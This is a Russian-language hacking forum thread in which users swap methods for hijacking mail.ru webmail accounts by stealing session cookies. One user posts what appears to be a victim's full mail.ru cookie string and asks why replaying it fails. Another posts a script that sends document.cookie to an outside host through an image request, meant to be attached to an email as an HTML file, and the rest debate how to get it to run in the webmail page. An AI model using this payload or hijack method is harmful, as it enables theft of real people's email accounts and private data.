Всем привет! Вот у меня есть QUERY: MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAABMLxwcA; mrcu=5FEB43F6AE6665B689FC0BA8F857; answer431-3=1; answer431-8=1; answer431-4=1; answer431-5=1; b15719=undefined; vote435=1; answer435-5=1; vote440=1; answer440-1=1; p=uYMIAEqnQgAA; p_sid=2a1c2b25d56a3c9538586f8c306d5e77; searchuid=7478091140342773; c56=c1xYRAAAAAD5EwEAAAAA; c8=5sVTRAAAAAD9SgEAAAAAAPuCAQAAAAAA Это из почты mail.ru, но ничего не получается =( Может что-то из этого ненужно забивать в куки, а некоторые значения вобще удалить? У меня ничё не получается
Ах блин! Он тогда в почту не защёл, блин! А я уже противоялие дал =(((( Ладно, буду ещё кого-нибудь юзать, пасибо.
наверно прикрипленный html файл с обычным <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Хочешь сказать, что если просто прикрепить хтмл файл к письму с таким скриптом, то хсс прокатит? Я думаю, что нет... Нужно письмо в хтмл формате отсылать... Да и к тому-же этот метод, что приведёт выше не прокатывает уже, как пол года или больше...
нет нет нет, фишка в том что чел отсылает прикрепленный html файл, а юзер открывает этот прикрепленный файл..... а так конечно не пашет =)
Так прикреплённый файл-то сначала скачать надо думаю и он срабатывать будит на машине жертвы в автономном режиме... Ну да ладно...
А разницы нет... Если просто открыть, то он всё-равно перед этим скачается временным файлом, а потом откроется...
С етово я понял чо сниферить мейл.ру невыгодно .. Мож ктото скажет реально на каких почтовых серверах прокатит ето ??
Че за бред?! Если хочешь куки юзверя... Нужно чтоб этот код выполнялся на странице "БРАУЗЕРA" http://win.mail.ru/cgi-bin/readmsg... А не в отдельном файле, которое находиться не на сервере а на твоем компе... document.cookie - Передает куки данного домена... Короче думаю понял )
ээээ.вроде если приклепляешь файл хтмл(и больше ничего, вроде) и открываешь в браузере сою почту, то он, вроде, а втоматически его открывает ввиде страницы прям в самом письме, пробовать надо, да ещё надо отправлять не в виде текста) вот тогда должно всё прокатить, но может и не прокатить, так ка он всё содержимое читает и показывает маленькую картинку с предупреждением